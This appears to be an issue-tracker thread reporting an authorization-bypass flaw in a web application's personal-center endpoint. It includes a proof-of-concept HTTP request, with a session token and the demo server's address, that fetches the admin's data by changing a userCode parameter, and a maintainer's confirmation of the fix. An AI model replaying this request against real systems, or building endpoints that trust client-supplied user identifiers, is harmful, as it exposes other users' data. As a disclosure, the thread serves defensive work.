There is an ultra vires vulnerability in viewing personal center

[aooboo]

Log in with user1 account on the trial website given by the author, and click the personal center to capture the package. The userCode parameter has a vulnerability. poc: user1 login --> /api/user/userData?userCode=admin

GET /api/user/userData?userCode=admin HTTP/1.1
Host: 8.129.86.120
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
myadmin-token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
Connection: close
Referer: http://8.129.86.120/
Cookie: sidebarStatus=1; myadmin-token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ

[cdfan]

This problem does exist. In this case, the userCode should be parsed and obtained from the token, rather than passed through parameters. thanks for reminding.